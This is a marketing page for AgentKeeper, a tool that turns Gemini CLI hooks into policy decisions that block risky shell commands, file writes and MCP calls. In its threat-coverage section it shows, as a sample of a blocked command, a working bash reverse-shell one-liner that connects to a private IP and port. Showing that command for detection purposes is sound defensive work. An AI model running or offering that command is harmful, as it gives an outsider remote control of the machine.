AgentKeeperby RAD Security

Gemini CLI enablement

Enable Gemini CLI without losing workstation control.

AgentKeeper turns Gemini CLI hooks into policy decisions for shell commands, file reads and writes, prompt submissions, web access, and MCP tool calls.

Enable Gemini CLISign in for setup docs

Runtime action stream

Gemini CLI

gemini
1

Shell commands

BeforeTool / run_shell_command

Block or allow
2

File writes

BeforeTool / write_file

Path policy
3

File edits

BeforeTool / replace

Path policy
4

File reads

BeforeTool / read_file

Audit or block

Why teams adopt it

Gemini CLI gets the same control plane as the rest of your agent fleet.

Use Gemini's synchronous hook points to validate tool arguments before execution.

Return deterministic blocks for dangerous writes, credential access, prompt injection, and risky commands.

Give platform teams one dashboard for Gemini CLI beside Codex, Claude Code, Cursor, Copilot, Windsurf, and Cowork.

Carry host, machine, session, tool, verdict, and policy context into the Activity and Security views.

Coverage

Agent actions become policy decisions.

ActionSignalResult
Shell commandsBeforeTool / run_shell_commandBlock or allow
File writesBeforeTool / write_filePath policy
File editsBeforeTool / replacePath policy
File readsBeforeTool / read_fileAudit or block
User promptsBeforeAgentDetect injection
MCP tool callsmcp__server__toolSkill policy

Threat coverage

Stop the agent behaviors attackers actually try.

Unsafe file writes

Prevent Gemini CLI from writing secrets, launch agents, deploy hooks, or system-level files.

write_file /etc/agentkeeper-e2e.conf

Reverse shells

Block commands that open outbound shells or turn development laptops into pivot points.

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

MCP data leakage

Apply server and tool allowlists before Gemini invokes external MCP integrations.

mcp__drive__read_file customer-export.csv

Install

One command, source-attributed events.

The installer writes the hook config, routes decisions through Runtime Shield, and labels events as gemini so security teams can filter by agent without slowing the developer down.

terminal
bash <(curl -fsSL https://www.agentkeeper.dev/install-hooks.sh) --ide gemini

Uses the same org policies as Claude Code, Cursor, Copilot, Windsurf, and Cowork.

Fails open on local outages while preserving API-backed audit history.

Feeds the Activity, Security, and Workstations views immediately after the first event.